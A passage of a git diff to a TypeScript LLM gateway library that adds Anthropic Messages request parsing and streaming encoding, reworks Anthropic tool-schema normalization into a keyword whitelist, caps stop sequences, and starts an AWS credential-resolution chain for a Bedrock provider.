HasCacheControl = { cache_control?: AnthropicCacheControl }; + +function readCacheControl(value: unknown): AnthropicCacheControl | undefined { + if (value === null || typeof value !== "object") return undefined; + const cc = (value as HasCacheControl).cache_control; + if (!cc || typeof cc !== "object" || cc.type !== "ephemeral") return undefined; + return cc; +} + +/** + * Anthropic clients annotate caching breakpoints per block via + * `cache_control: { type: "ephemeral", ttl?: "1h"|"5m" }`. pi-ai's + * `cacheRetention` is per-request, not per-block, and its anthropic provider + * re-applies breakpoints itself on the rebuilt outbound wire. Scan every + * block once and return the strongest retention requested: any `ttl: "1h"` + * promotes the request to "long", anything else ephemeral maps to "short". + */ +function deriveCacheRetention(data: { + system?: unknown; + messages: readonly unknown[]; + tools?: readonly unknown[]; +}): "short" | "long" | undefined { + let strongest: "short" | "long" | undefined; + const visit = (cc: AnthropicCacheControl | undefined): void => { + if (!cc) return; + if (cc.ttl === "1h") strongest = "long"; + else strongest ??= "short"; + }; + if (Array.isArray(data.system)) { + for (const block of data.system) visit(readCacheControl(block)); + } + for (const message of data.messages) { + if (message === null || typeof message !== "object") continue; + const content = (message as { content?: unknown }).content; + if (!Array.isArray(content)) continue; + for (const block of content) visit(readCacheControl(block)); + } + if (data.tools) { + for (const tool of data.tools) visit(readCacheControl(tool)); + } + return strongest; +} + +export function parseRequest(body: unknown, headers?: Headers): ParsedRequest { + const parsed = anthropicMessagesRequestSchema.safeParse(body); + if (!parsed.success) { + throw new Error(`anthropic-messages: ${parsed.error.message}`); + } + const data = parsed.data; + + const now = Date.now(); + const messages: Message[] = []; + for (const message of data.messages as AnthropicMessage[]) { + if (message.role === "user") { + for (const m of walkUserContent(message.content, now)) messages.push(m); + } else { + const assistant: AssistantMessage = { + role: "assistant", + content: walkAssistantContent(message.content), + api: "anthropic-messages", + provider: "anthropic", + model: data.model, + usage: emptyUsage(), + stopReason: "stop", + timestamp: now, + }; + messages.push(assistant); + } + } + + const options: ParsedRequest["options"] = { + maxOutputTokens: data.max_tokens, + }; + if (data.temperature !== undefined) options.temperature = data.temperature; + if (data.top_p !== undefined) options.topP = data.top_p; + if (data.top_k !== undefined) options.topK = data.top_k; + if (data.stop_sequences) options.stopSequences = data.stop_sequences; + const toolChoice = mapToolChoice(data.tool_choice as AnthropicToolChoice | undefined); + if (toolChoice !== undefined) options.toolChoice = toolChoice; + // `disable_parallel_tool_use === true` means the client wants the model to + // emit at most one tool call per turn; map to pi-ai's negated boolean. + // Leave undefined when the field is absent or explicitly `false` so we + // don't override provider defaults. + if (data.tool_choice?.disable_parallel_tool_use === true) { + options.parallelToolCalls = false; + } + if (data.thinking) { + switch (data.thinking.type) { + case "enabled": + options.explicitThinkingBudgetTokens = data.thinking.budget_tokens; + break; + case "disabled": + options.disableReasoning = true; + break; + case "adaptive": + if (data.thinking.budget_tokens !== undefined) { + options.explicitThinkingBudgetTokens = data.thinking.budget_tokens; + } + break; + } + } + const cacheRetention = deriveCacheRetention(data); + if (cacheRetention !== undefined) options.cacheRetention = cacheRetention; + // Anthropic clients commonly send `metadata: { user_id }`; forward verbatim + // so downstream providers (and our anthropic-passthrough fast-path) can + // preserve abuse-tracking signal. + if (data.metadata !== undefined) { + options.metadata = data.metadata as Record<string, unknown>; + } + const cacheKey = resolvePromptCacheKey(body, headers); + if (cacheKey !== undefined) options.promptCacheKey = cacheKey; + // Allow-listed header capture. The gateway's `handleFormatEndpoint` + // already merges its own pre-capture under whatever the parser sets, but + // we populate here too so direct callers of `parseRequest` (tests, custom + // wrappers) see the same surface. `anthropic-version` is the most + // load-bearing — some downstream Anthropic-API targets reject requests + // missing it. + if (headers) { + const captured = captureRequestHeaders(headers); + if (Object.keys(captured).length > 0) options.headers = captured; + } + + return { + modelId: data.model, + context: { + systemPrompt: buildSystemPrompt(data.system as AnthropicSystem), + messages, + tools: walkTools(data.tools as AnthropicTool[] | undefined), + }, + stream: data.stream === true, + options, + }; +} + +function emptyUsage(): AssistantMessage["usage"] { + return { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, + }; +} + +// --------------------------------------------------------------------------- +// Outbound encoding +// --------------------------------------------------------------------------- + +function newMessageId(): string { + const hex = (globalThis.crypto?.randomUUID?.() ?? randomFallback()).replace(/-/g, "").slice(0, 24); + return `msg_${hex}`; +} + +function randomFallback(): string { + // Sufficient for tests / environments without crypto.randomUUID + const buf = new Uint8Array(16); + for (let i = 0; i < 16; i++) buf[i] = Math.floor(Math.random() * 256); + const hex = Array.from(buf, b => b.toString(16).padStart(2, "0")).join(""); + return `${hex.slice(0, 8)}-${hex.slice(8, 12)}-${hex.slice(12, 16)}-${hex.slice(16, 20)}-${hex.slice(20)}`; +} + +function mapStopReasonOut(reason: StopReason): "end_turn" | "max_tokens" | "tool_use" { + switch (reason) { + case "length": + return "max_tokens"; + case "toolUse": + return "tool_use"; + default: + return "end_turn"; + } +} + +function encodeContentBlocks(message: AssistantMessage): Record<string, unknown>[] { + const blocks: Record<string, unknown>[] = []; + for (const c of message.content) { + switch (c.type) { + case "text": + blocks.push({ type: "text", text: c.text }); + break; + case "thinking": { + const b: Record<string, unknown> = { type: "thinking", thinking: c.thinking }; + if (c.thinkingSignature) b.signature = c.thinkingSignature; + blocks.push(b); + break; + } + case "redactedThinking": + blocks.push({ type: "redacted_thinking", data: c.data }); + break; + case "toolCall": + blocks.push({ type: "tool_use", id: c.id, name: c.name, input: c.arguments ?? {} }); + break; + } + } + return blocks; +} + +function encodeUsage(message: AssistantMessage): Record<string, unknown> { + return { + input_tokens: message.usage.input, + output_tokens: message.usage.output, + cache_read_input_tokens: message.usage.cacheRead, + cache_creation_input_tokens: message.usage.cacheWrite, + }; +} + +export function encodeResponse(message: AssistantMessage, requestedModelId: string): Record<string, unknown> { + if (message.stopReason === "error" || message.stopReason === "aborted") { + throw new Error(message.errorMessage ?? `anthropic-messages: upstream ${message.stopReason}`); + } + return { + id: message.responseId ?? newMessageId(), + type: "message", + role: "assistant", + model: requestedModelId, + content: encodeContentBlocks(message), + stop_reason: mapStopReasonOut(message.stopReason), + // TODO: surface the matched stop sequence once pi-ai's + // `AssistantMessage.stopReason` carries the matched string. Intentionally + // `null` for now (Anthropic schema allows it). + stop_sequence: null, + usage: encodeUsage(message), + }; +} + +// --------------------------------------------------------------------------- +// Streaming encoder +// --------------------------------------------------------------------------- + +const ENCODER = new TextEncoder(); + +function sseFrame(event: string, data: Record<string, unknown>): Uint8Array { + return ENCODER.encode(`event: ${event}\ndata: ${JSON.stringify(data)}\n\n`); +} + +type BlockKind = "text" | "thinking" | "tool_use"; + +interface OpenBlock { + index: number; + kind: BlockKind; +} + +export function encodeStream( + events: AssistantMessageEventStream, + requestedModelId: string, +): ReadableStream<Uint8Array> { + return new ReadableStream<Uint8Array>({ + async start(controller) { + const messageId = newMessageId(); + let started = false; + const open = new Map<number, OpenBlock>(); + + const ensureStart = (partial: AssistantMessage) => { + if (started) return; + started = true; + controller.enqueue( + sseFrame("message_start", { + type: "message_start", + message: { + id: messageId, + type: "message", + role: "assistant", + model: requestedModelId, + content: [], + stop_reason: null, + // TODO: same as encodeResponse — surface matched stop sequence + // once pi-ai propagates it. + stop_sequence: null, + usage: encodeUsage(partial), + }, + }), + ); + }; + + const closeBlock = (index: number) => { + if (!open.has(index)) return; + controller.enqueue(sseFrame("content_block_stop", { type: "content_block_stop", index })); + open.delete(index); + }; + + try { + for await (const ev of events) { + switch (ev.type) { + case "start": + ensureStart(ev.partial); + break; + case "text_start": { + ensureStart(ev.partial); + open.set(ev.contentIndex, { index: ev.contentIndex, kind: "text" }); + controller.enqueue( + sseFrame("content_block_start", { + type: "content_block_start", + index: ev.contentIndex, + content_block: { type: "text", text: "" }, + }), + ); + break; + } + case "text_delta": + controller.enqueue( + sseFrame("content_block_delta", { + type: "content_block_delta", + index: ev.contentIndex, + delta: { type: "text_delta", text: ev.delta }, + }), + ); + break; + case "text_end": + closeBlock(ev.contentIndex); + break; + case "thinking_start": { + ensureStart(ev.partial); + open.set(ev.contentIndex, { index: ev.contentIndex, kind: "thinking" }); + controller.enqueue( + sseFrame("content_block_start", { + type: "content_block_start", + index: ev.contentIndex, + content_block: { type: "thinking", thinking: "" }, + }), + ); + break; + } + case "thinking_delta": + controller.enqueue( + sseFrame("content_block_delta", { + type: "content_block_delta", + index: ev.contentIndex, + delta: { type: "thinking_delta", thinking: ev.delta }, + }), + ); + break; + case "thinking_end": { + const c = ev.partial.content[ev.contentIndex]; + if (c?.type === "thinking" && c.thinkingSignature) { + controller.enqueue( + sseFrame("content_block_delta", { + type: "content_block_delta", + index: ev.contentIndex, + delta: { type: "signature_delta", signature: c.thinkingSignature }, + }), + ); + } + closeBlock(ev.contentIndex); + break; + } + case "toolcall_start": { + ensureStart(ev.partial); + const tc = ev.partial.content[ev.contentIndex] as ToolCall | undefined; + open.set(ev.contentIndex, { index: ev.contentIndex, kind: "tool_use" }); + controller.enqueue( + sseFrame("content_block_start", { + type: "content_block_start", + index: ev.contentIndex, + content_block: { + type: "tool_use", + id: tc?.id ?? "", + name: tc?.name ?? "", + input: {}, + }, + }), + ); + break; + } + case "toolcall_delta": + controller.enqueue( + sseFrame("content_block_delta", { + type: "content_block_delta", + index: ev.contentIndex, + delta: { type: "input_json_delta", partial_json: ev.delta }, + }), + ); + break; + case "toolcall_end": + closeBlock(ev.contentIndex); + break; + case "done": { + for (const idx of [...open.keys()]) closeBlock(idx); + controller.enqueue( + sseFrame("message_delta", { + type: "message_delta", + // TODO: surface matched stop sequence once pi-ai + // propagates it on the `done` event. + delta: { stop_reason: mapStopReasonOut(ev.reason), stop_sequence: null }, + usage: encodeUsage(ev.message), + }), + ); + controller.enqueue(sseFrame("message_stop", { type: "message_stop" })); + controller.close(); + return; + } + case "error": { + const msg = ev.error.errorMessage ?? "stream error"; + controller.enqueue( + sseFrame("error", { type: "error", error: { type: "api_error", message: msg } }), + ); + controller.close(); + return; + } + } + } + // stream ended without explicit done; close gracefully + for (const idx of [...open.keys()]) closeBlock(idx); + controller.enqueue(sseFrame("message_stop", { type: "message_stop" })); + controller.close(); + } catch (err) { + controller.enqueue( + sseFrame("error", { + type: "error", + error: { type: "api_error", message: err instanceof Error ? err.message : String(err) }, + }), + ); + controller.close(); + } + }, + }); +} + +// --------------------------------------------------------------------------- +// Error envelope +// --------------------------------------------------------------------------- + +/** + * Anthropic error envelope: `{ type: "error", error: { type, message } }`. + * See https://docs.anthropic.com/en/api/errors. Returned as a `Response` so + * the gateway can hand it straight back to the client without extra wrapping. + */ +export function formatError(status: number, type: string, message: string): Response { + return new Response(JSON.stringify({ type: "error", error: { type, message } }), { + status, + headers: { "Content-Type": "application/json" }, + }); +} diff --git a/packages/ai/src/providers/anthropic.ts b/packages/ai/src/providers/anthropic.ts index 272591ef0..629197328 100644 --- a/packages/ai/src/providers/anthropic.ts +++ b/packages/ai/src/providers/anthropic.ts @@ -15,6 +15,7 @@ import { isEnoent, isRetryableError, isUnexpectedSocketCloseMessage, + logger, readSseEvents, } from "@oh-my-pi/pi-utils"; import { hasOpus47ApiRestrictions, mapEffortToAnthropicAdaptiveEffort } from "../model-thinking"; @@ -59,6 +60,7 @@ import { parseGitHubCopilotApiKey } from "../utils/oauth/github-copilot"; import { notifyProviderResponse } from "../utils/provider-response"; import { isCopilotTransientModelError } from "../utils/retry"; import { COMBINATOR_KEYS, NO_STRICT, toolWireSchema } from "../utils/schema"; +import { spillToDescription } from "../utils/schema/spill"; import { notifyRawSseEvent, wrapFetchForSseDebug } from "../utils/sse-debug"; import { buildCopilotDynamicHeaders, @@ -203,6 +205,9 @@ type AnthropicSamplingParams = MessageCreateParamsStreaming & { top_k?: number; }; +const ANTHROPIC_STOP_SEQUENCES_MAX = 4; +let warnedStopSequencesTrim = false; + /** * Adaptive thinking `display` is supported starting with Claude Opus 4.7. * Older adaptive-thinking models (Opus 4.6, Sonnet 4.6+) reject the field. @@ -1293,7 +1298,11 @@ export const streamAnthropic: StreamFunction<"anthropic-messages"> = ( } providerRetryAttempt++; const delayMs = PROVIDER_BASE_DELAY_MS * 2 ** (providerRetryAttempt - 1); - await scheduler.wait(delayMs, { signal: options?.signal }); + if (options?.providerRetryWait) { + await options.providerRetryWait(delayMs, options.signal); + } else { + await scheduler.wait(delayMs, { signal: options?.signal }); + } output.content.length = 0; output.responseId = undefined; output.errorMessage = strictFallbackErrorMessage; @@ -1780,6 +1789,18 @@ function buildParams( if (options?.topK !== undefined) { params.top_k = options.topK; } + if (options?.stopSequences?.length) { + const seqs = options.stopSequences; + if (seqs.length > ANTHROPIC_STOP_SEQUENCES_MAX && !warnedStopSequencesTrim) { + warnedStopSequencesTrim = true; + logger.warn("anthropic: stop_sequences exceeds 4; extra entries dropped", { + received: seqs.length, + kept: ANTHROPIC_STOP_SEQUENCES_MAX, + }); + } + params.stop_sequences = + seqs.length > ANTHROPIC_STOP_SEQUENCES_MAX ? seqs.slice(0, ANTHROPIC_STOP_SEQUENCES_MAX) : seqs; + } // Opus 4.7+ rejects non-default sampling parameters with 400 error. if (hasOpus47ApiRestrictions(model.id)) { @@ -2073,28 +2094,56 @@ export function convertAnthropicMessages( } /** - * JSON Schema keywords Anthropic's tool-schema validator rejects on every node type. - * Mirrors the keys that fall through to the description-spill branch in the Anthropic - * Python SDK's `lib/_parse/_transform.py::transform_schema`. + * JSON Schema whitelist for Anthropic tool `input_schema` nodes. * - * We use `Set` here (not `Record<string, true>`) because membership is probed against - * arbitrary user/Zod-derived schema keys: with a literal Record, lookups for prototype - * names like `"toString"` would falsely match and silently strip valid properties. + * Mirrors the Anthropic Python SDK's `lib/_parse/_transform.py::transform_schema`: + * we keep only structural/metadata keywords Anthropic's validator honors, and demote + * anything else into the node's `description` as `\n\n{key: value, ...}` so the model + * still sees the constraint as a natural-language hint. + * + * `Set` (not `Record<string, true>`) because membership is probed against arbitrary + * user/Zod-derived schema keys: a literal Record would falsely match prototype names + * like `"toString"` and silently strip valid properties. */ -const ANTHROPIC_UNSUPPORTED_TOOL_SCHEMA_FIELDS = new Set(["maxItems", "patternProperties", "propertyNames"]); +const ANTHROPIC_TOOL_SCHEMA_UNIVERSAL_KEEP = new Set([ + "$ref", + "$defs", + "$schema", + "definitions", + "type", + "anyOf", + "oneOf", + "allOf", + "enum", + "const", + "description", + "title", + "default", + "nullable", +]); +/** Keys preserved on `type: "object"` nodes (in addition to the universal set). */ +const ANTHROPIC_TOOL_SCHEMA_OBJECT_KEEP = new Set(["properties", "required", "additionalProperties"]); +/** Keys preserved on `type: "array"` nodes; `minItems` only when its value is 0 or 1. */ +const ANTHROPIC_TOOL_SCHEMA_ARRAY_KEEP = new Set(["items", "prefixItems", "minItems"]); +/** Keys preserved on `type: "string"` nodes; `format` only when its value is in the supported list. */ +const ANTHROPIC_TOOL_SCHEMA_STRING_KEEP = new Set(["format"]); /** - * JSON Schema keywords Anthropic rejects specifically on `number`/`integer` nodes - * ("For 'number' type, properties maximum, minimum are not supported"). These are - * still useful hints for the model, so callers demote them into the node's - * `description` rather than dropping them outright. + * String `format` values Anthropic accepts; everything else (including `pattern`-style + * format hints) gets demoted into `description`. Matches `SupportedStringFormats` in the + * Anthropic SDK's `_transform.py`. */ -const ANTHROPIC_UNSUPPORTED_NUMERIC_FIELDS = [ - "minimum", - "maximum", - "exclusiveMinimum", - "exclusiveMaximum", - "multipleOf", -] as const; +const ANTHROPIC_TOOL_SCHEMA_STRING_FORMATS = new Set([ + "date-time", + "time", + "date", + "duration", + "email", + "hostname", + "uri", + "ipv4", + "ipv6", + "uuid", +]); const ANTHROPIC_STRICT_TOOL_ALLOWLIST = new Set(["bash", "python", "edit", "find"]); const MAX_ANTHROPIC_STRICT_TOOLS = 20; const MAX_ANTHROPIC_STRICT_OPTIONAL_PARAMETERS = 24; @@ -2117,132 +2166,148 @@ function isJsonSchemaObjectNode(schema: Record<string, unknown>): boolean { } /** - * Demote unsupported JSON Schema keywords into the node's `description` so the model - * still gets the constraint as a natural-language hint after we strip it from the wire - * schema. Mirrors the trailing description-spill in the Anthropic Python SDK's - * `lib/_parse/_transform.py::transform_schema`, formatted as `{key: value, ...}`. - * - * `entries` are applied in order and only when the value is not `undefined`; an empty - * input is a no-op so callers can pass the same set unconditionally. + * Pick the principal non-null scalar type from a `type` keyword. Anthropic accepts + * `type` as either a single string or an array (e.g. `["number", "null"]` for a + * nullable value); the SDK whitelist is keyed off the scalar type, with `"null"` + * ignored so nullable variants are normalized as their underlying type. */ -function spillToDescription(node: Record<string, unknown>, entries: Array<[string, unknown]>): void { - const spilled = entries.filter(([, value]) => value !== undefined); - if (spilled.length === 0) return; - const formatted = `{${spilled.map(([key, value]) => `${key}: ${JSON.stringify(value)}`).join(", ")}}`; - const existing = typeof node.description === "string" ? node.description : ""; - node.description = existing ? `${existing}\n\n${formatted}` : formatted; +function pickAnthropicScalarType(type: unknown): string | undefined { + if (typeof type === "string") return type; + if (Array.isArray(type)) { + for (const entry of type) { + if (typeof entry === "string" && entry !== "null") return entry; + } + } + return undefined; +} + +function anthropicPerTypeKeep(scalarType: string | undefined): Set<string> | undefined { + switch (scalarType) { + case "object": + return ANTHROPIC_TOOL_SCHEMA_OBJECT_KEEP; + case "array": + return ANTHROPIC_TOOL_SCHEMA_ARRAY_KEEP; + case "string": + return ANTHROPIC_TOOL_SCHEMA_STRING_KEEP; + default: + return undefined; + } } /** - * Strip `keys` off `node` and spill the removed values into its `description`. + * Per-schema-object memoization slot for the normalized Anthropic tool form. We stamp + * the result onto the host via a `Symbol` property (mirroring `utils/schema/stamps.ts`) + * instead of using a `WeakMap`: it's a single hidden-class slot, so warm reads are + * direct property access and write-once cycles resolve to the in-progress result. */ -function spillKeysToDescription(node: Record<string, unknown>, keys: readonly string[]): void { - const entries: Array<[string, unknown]> = []; - for (const key of keys) { - const value = node[key]; - if (value === undefined) continue; - entries.push([key, value]); - delete node[key]; - } - spillToDescription(node, entries); -} +const kAnthropicToolNormal = Symbol("pi.schema.anthropic.toolNormal"); -export function normalizeAnthropicToolSchema( - schema: unknown, - cache: WeakMap<Record<string, unknown>, Record<string, unknown>> = new WeakMap(), -): unknown { +/** + * Normalize a JSON Schema node for Anthropic tool `input_schema`. + * + * Applies the full whitelist semantics from the Anthropic Python SDK's + * `lib/_parse/_transform.py::transform_schema`: + * + * 1. Universal keys (`$ref`, `$defs`, `type`, `anyOf`/`oneOf`/`allOf`, `enum`, `const`, + * `description`, `title`, `default`, `nullable`) are preserved on every node. + * 2. Per-type keys are kept additively (object → `properties`/`required`/`additionalProperties`, + * array → `items`/`prefixItems` plus `minItems` only when 0 or 1, string → `format` + * only when in the supported value set). + * 3. Everything else is demoted into the node's `description` as `\n\n{key: value, ...}` + * so the model still sees the constraint as a natural-language hint. + * + * Object nodes default to `additionalProperties: false`, but explicit open-map + * declarations (`additionalProperties: true` or a schema literal — Zod's + * `z.record(z.string(), z.unknown())` produces `{}`) are preserved. The strict-mode + * pass downstream demotes those shapes to non-strict instead of fabricating a closed + * object, so callers like the resolve tool keep working open-map semantics. + */ +export function normalizeAnthropicToolSchema(schema: unknown): unknown { + if (Array.isArray(schema)) return schema.map(entry => normalizeAnthropicToolSchema(entry)); if (!isRecord(schema)) return schema; - const cached = cache.get(schema); - if (cached) return cached; + const slot = schema as Record<symbol, Record<string, unknown> | undefined>; + const existing = slot[kAnthropicToolNormal]; + if (existing !== undefined) return existing; const result: Record<string, unknown> = {}; - cache.set(schema, result); - const universalSpill: Array<[string, unknown]> = []; + // Pre-stamp before recursion so cyclic schemas resolve to the in-progress object + // (mirrors the WeakMap-set-before-recurse pattern the original implementation used). + Object.defineProperty(schema, kAnthropicToolNormal, { value: result, writable: true, configurable: true }); + + const scalarType = pickAnthropicScalarType(schema.type); + const perTypeKeep = anthropicPerTypeKeep(scalarType); + const spill: Array<[string, unknown]> = []; + for (const key in schema) { if (!Object.hasOwn(schema, key)) continue; const value = schema[key]; - if (ANTHROPIC_UNSUPPORTED_TOOL_SCHEMA_FIELDS.has(key)) { - universalSpill.push([key, value]); - continue; + if (ANTHROPIC_TOOL_SCHEMA_UNIVERSAL_KEEP.has(key) || perTypeKeep?.has(key)) { + result[key] = value; + } else { + spill.push([key, value]); } - result[key] = value; } - if (isJsonSchemaObjectNode(result)) { - // `minItems` is meaningless on objects; Anthropic rejects it even for 0/1. - if (result.minItems !== undefined) universalSpill.push(["minItems", result.minItems]); - delete result.minItems; - } else { + + // Per-type conditional keys: prune within the kept set. + if (scalarType === "string") { + const format = result.format; + if (typeof format === "string" && !ANTHROPIC_TOOL_SCHEMA_STRING_FORMATS.has(format)) { + spill.push(["format", format]); + delete result.format; + } + } + if (scalarType === "array" && result.minItems !== undefined) { const minItems = result.minItems; - if (typeof minItems === "number" && minItems !== 0 && minItems !== 1) { - universalSpill.push(["minItems", minItems]); + if (!(typeof minItems === "number" && (minItems === 0 || minItems === 1))) { + spill.push(["minItems", minItems]); delete result.minItems; } } - spillToDescription(result, universalSpill); - - const nodeType = result.type; - const isNumericNode = - nodeType === "number" || - nodeType === "integer" || - (Array.isArray(nodeType) && nodeType.some(t => t === "number" || t === "integer")); - if (isNumericNode) spillKeysToDescription(result, ANTHROPIC_UNSUPPORTED_NUMERIC_FIELDS); - - const type = result.type; - const canBeObject = - type === "object" || (Array.isArray(type) && type.includes("object")) || isRecord(result.properties); - if (canBeObject) { - // Preserve explicit open-map declarations: `additionalProperties: true` - // and schema values such as `{}` (Zod's - // `z.record(z.string(), z.unknown())` output). Only close objects that - // left the field unspecified, so we don't silently strip a valid - // open-map declaration along with unsupported `patternProperties` / - // `propertyNames` keywords. Without this, fields like the resolve tool's - // `extra` are flattened to `{ type: "object", additionalProperties: false }`, - // which forbids every key and breaks plan approval (`extra: { title }`). - if (result.additionalProperties === undefined) { - result.additionalProperties = false; - } else if (isRecord(result.additionalProperties)) { - result.additionalProperties = normalizeAnthropicToolSchema(result.additionalProperties, cache); - } + if (scalarType === "object" && result.additionalProperties === undefined) { + result.additionalProperties = false; } + // Recurse on structural keys. if (isRecord(result.properties)) { - result.properties = Object.fromEntries( - Object.entries(result.properties).map(([propertyName, propertySchema]) => [ - propertyName, - normalizeAnthropicToolSchema(propertySchema, cache), - ]), - ); + const normalizedProperties: Record<string, unknown> = {}; + const sourceProperties = result.properties as Record<string, unknown>; + for (const propName in sourceProperties) { + if (!Object.hasOwn(sourceProperties, propName)) continue; + normalizedProperties[propName] = normalizeAnthropicToolSchema(sourceProperties[propName]); + } + result.properties = normalizedProperties; + } + if (isRecord(result.additionalProperties)) { + result.additionalProperties = normalizeAnthropicToolSchema(result.additionalProperties); } - if (Array.isArray(result.items)) { - result.items = result.items.map(item => normalizeAnthropicToolSchema(item, cache)); + result.items = result.items.map(item => normalizeAnthropicToolSchema(item)); } else if (isRecord(result.items)) { - result.items = normalizeAnthropicToolSchema(result.items, cache); + result.items = normalizeAnthropicToolSchema(result.items); } if (Array.isArray(result.prefixItems)) { - result.prefixItems = result.prefixItems.map(item => normalizeAnthropicToolSchema(item, cache)); + result.prefixItems = result.prefixItems.map(item => normalizeAnthropicToolSchema(item)); } - for (const key of COMBINATOR_KEYS) { const variants = result[key]; if (Array.isArray(variants)) { - result[key] = variants.map(variant => normalizeAnthropicToolSchema(variant, cache)); + result[key] = variants.map(variant => normalizeAnthropicToolSchema(variant)); } } - for (const defsKey of ["$defs", "definitions"] as const) { const definitions = result[defsKey]; if (!isRecord(definitions)) continue; - result[defsKey] = Object.fromEntries( - Object.entries(definitions).map(([definitionName, definitionSchema]) => [ - definitionName, - normalizeAnthropicToolSchema(definitionSchema, cache), - ]), - ); + const normalizedDefs: Record<string, unknown> = {}; + const sourceDefs = definitions as Record<string, unknown>; + for (const name in sourceDefs) { + if (!Object.hasOwn(sourceDefs, name)) continue; + normalizedDefs[name] = normalizeAnthropicToolSchema(sourceDefs[name]); + } + result[defsKey] = normalizedDefs; } + spillToDescription(result, spill); return result; } diff --git a/packages/ai/src/providers/aws-credentials.ts b/packages/ai/src/providers/aws-credentials.ts new file mode 100644 index 000000000..831bc7fa2 --- /dev/null +++ b/packages/ai/src/providers/aws-credentials.ts @@ -0,0 +1,334 @@ +/** + * AWS credential resolution for the Bedrock provider. + * + * Chain (first hit wins): + * 1. Static credentials from the environment + * (`AWS_ACCESS_KEY_ID` + `AWS_SECRET_ACCESS_KEY` [+ `AWS_SESSION_TOKEN`]). + * 2. Profile in `~/.aws/credentials` (and `~/.aws/config` for SSO): + * - static `aws_access_key_id` / `aws_secret_access_key` / `aws_session_token` + * - SSO profile referencing a cached token in `~/.aws/sso/cache/*.json`, + * which we exchange for short-lived role credentials via + * `https://portal.sso.{region}.amazonaws.com/federation/credentials`. + * 3. EC2 IMDSv2 (only when `AWS_EC2_METADATA_DISABLED` is unset / falsey and + * `169.254.169.254` is reachable within a 1 s timeout). + * + * Resolved credentials are cached process-wide per profile and refreshed + * 60 s before `Expiration` to absorb clock skew. + */ + +import * as fs from "node:fs"; +import * as os from "node:os"; +import * as path from "node:path"; +import { $env, isEnoent, logger } from "@oh-my-pi/pi-utils"; +import type { AwsCredentials } from "./aws-sigv4"; + +export interface ResolvedCredentials extends AwsCredentials { + /** Absolute expiration timestamp in ms. `undefined` for non-expiring static creds. */ + expiresAt?: number; +} + +export interface CredentialResolveOptions { + /** Named profile from `~/.aws/credentials` / `~/.aws/config`. */ + profile?: string; + /** Falls back to env (`AWS_REGION` / `AWS_DEFAULT_REGION`) and finally `us-east-1`. */ + region?: string; + signal?: AbortSignal; +} + +const REFRESH_SKEW_MS = 60_000; + +interface CacheEntry { + creds: ResolvedCredentials; + expiresAt: number; +} + +const cache: Map<string, CacheEntry> = new Map(); + +export async function resolveAwsCredentials(opts: CredentialResolveOptions = {}): Promise<ResolvedCredentials> { + const profile = opts.profile || $env.AWS_PROFILE || "default"; + const region = opts.region || $env.AWS_REGION || $env.AWS_DEFAULT_REGION || "us-east-1"; + const cacheKey = `${profile}\x00${region}`; + + const hit = cache.get(cacheKey); + if (hit && hit.expiresAt - REFRESH_SKEW_MS > Date.now()) return hit.creds; + + const creds = await resolveFresh(profile, region, opts.signal); + cache.set(cacheKey, { creds, expiresAt: creds.expiresAt ?? Number.POSITIVE_INFINITY }); + return creds; +} + +async function resolveFresh(profile: string, region: string, signal?: AbortSignal): Promise<ResolvedCredentials> { + // 1. Environment first — matches the AWS SDK chain order. + const envCreds = readEnvCredentials(); + if (envCreds) return envCreds; + + // 2. Profile (static or SSO). + const profileCreds = await readProfileCredentials(profile, region, signal); + if (profileCreds) return profileCreds; + + // 3. EC2 IMDSv2. + if ($env.AWS_EC2_METADATA_DISABLED?.toLowerCase() !== "true") { + const imdsCreds = await readImdsCredentials(signal); + if (imdsCreds) return imdsCreds; + } + + throw new Error( + `Unable to resolve AWS credentials. Set AWS_ACCESS_KEY_ID+AWS_SECRET_ACCESS_KEY, ` + + `or configure profile '${profile}' in ~/.aws/credentials (or ~/.aws/config for SSO).`, + ); +} + +function readEnvCredentials(): ResolvedCredentials | undefined { + const ak = $env.AWS_ACCESS_KEY_ID; + const sk = $env.AWS_SECRET_ACCESS_KEY; + if (!ak || !sk) return undefined; + const token = $env.AWS_SESSION_TOKEN; + return token + ? { accessKeyId: ak, secretAccessKey: sk, sessionToken: token } + : { accessKeyId: ak, secretAccessKey: sk }; +} + +// ---------- INI parsing ---------- + +/** Map of section name -> map of key -> value. Section names are stripped of + * any leading `profile ` (so `~/.aws/config` aligns with `~/.aws/credentials`). */ +type IniFile = Record<string, Record<string, string>>; + +function parseIni(text: string): IniFile { + const out: IniFile = {}; + let current: Record<string, string> | null = null; + for (const rawLine of text.split(/\r?\n/)) { + const line = rawLine.trim(); + if (!line || line.startsWith("#") || line.startsWith(";")) continue; + if (line.startsWith("[") && line.endsWith("]")) { + let name = line.slice(1, -1).trim(); + if (name.startsWith("profile ")) name = name.slice(8).trim(); + if (name.startsWith("sso-session ")) name = `sso-session:${name.slice(12).trim()}`; + let section = out[name]; + if (!section) { + section = {}; + out[name] = section; + } + current = section; + continue; + } + if (!current) continue; + const eq = line.indexOf("="); + if (eq === -1) continue; + current[line.slice(0, eq).trim()] = line.slice(eq + 1).trim(); + } + return out; +} + +async function readIniFile(p: string): Promise<IniFile | undefined> { + try { + const text = await fs.promises.readFile(p, "utf8"); + return parseIni(text); + } catch (err) { + if (isEnoent(err)) return undefined; + throw err; + } +} + +// ---------- Profile / SSO ---------- + +async function readProfileCredentials( + profile: string, + region: string, + signal: AbortSignal | undefined, +): Promise<ResolvedCredentials | undefined> { + const home = os.homedir(); + const credentialsPath = $env.AWS_SHARED_CREDENTIALS_FILE || path.join(home, ".aws", "credentials"); + const configPath = $env.AWS_CONFIG_FILE || path.join(home, ".aws", "config"); + + const credentialsIni = await readIniFile(credentialsPath); + const configIni = await readIniFile(configPath); + + // Static credentials live in ~/.aws/credentials; SSO config lives in + // ~/.aws/config under `[profile foo]`. Merge into a single view. + const merged: Record<string, string> = { ...(configIni?.[profile] ?? {}), ...(credentialsIni?.[profile] ?? {}) }; + if (Object.keys(merged).length === 0) return undefined; + + if (merged.aws_access_key_id && merged.aws_secret_access_key) { + const out: ResolvedCredentials = { + accessKeyId: merged.aws_access_key_id, + secretAccessKey: merged.aws_secret_access_key, + }; + if (merged.aws_session_token) out.sessionToken = merged.aws_session_token; + return out; + } + + if (merged.sso_account_id && merged.sso_role_name) { + return readSsoCredentials(merged, configIni, region, signal); + } + + return undefined; +} + +interface SsoCachedToken { + accessToken?: string; + expiresAt?: string; + startUrl?: string; + region?: string; +} + +async function readSsoCredentials( + profileCfg: Record<string, string>, + configIni: IniFile | undefined, + 